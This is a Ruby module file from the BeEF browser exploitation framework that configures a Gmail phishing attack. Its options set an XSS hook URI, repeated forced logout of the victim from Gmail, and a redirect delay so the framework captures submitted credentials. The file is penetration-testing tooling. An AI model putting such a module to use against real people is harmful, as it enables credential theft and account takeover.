1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Gmail_phishing < BeEF::Core::Command
7
  def self.options
8
    @configuration = BeEF::Core::Configuration.instance
9
    proto = @configuration.beef_proto
10
    beef_host = @configuration.beef_host
11
    beef_port = @configuration.beef_port
12
    base_host = "#{proto}://#{beef_host}:#{beef_port}"
13

14
    xss_hook_url = "#{base_host}/demos/plain.html"
15
    logout_gmail_interval = 10_000
16
    wait_seconds_before_redirect = 1000
17
    [
18
      { 'name' => 'xss_hook_url',
19
        'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, ' \
20
        'simply leave this field empty, but this means you will loose the hooked browser after executing this module.',
21
        'ui_label' => 'XSS hook URI',
22
        'value' => xss_hook_url,
23
        'width' => '300px' }, {
24
          'name' => 'logout_gmail_interval',
25
          'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
26
          'ui_label' => 'Gmail logout interval (ms)',
27
          'value' => logout_gmail_interval,
28
          'width' => '100px'
29
        }, {
30
          'name' => 'wait_seconds_before_redirect',
31
          'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) ' \
32
          'before we redirect to the real Gmail page, so that BeEF gets the credentials in time.',
33
          'ui_label' => 'Redirect delay (ms)',
34
          'value' => wait_seconds_before_redirect,
35
          'width' => '100px'
36
        }
37
    ]
38
  end
39

40
  def post_execute
41
    content = {}
42
    content['Result'] = @datastore['result']
43
    save content
44
  end
45
end
46

47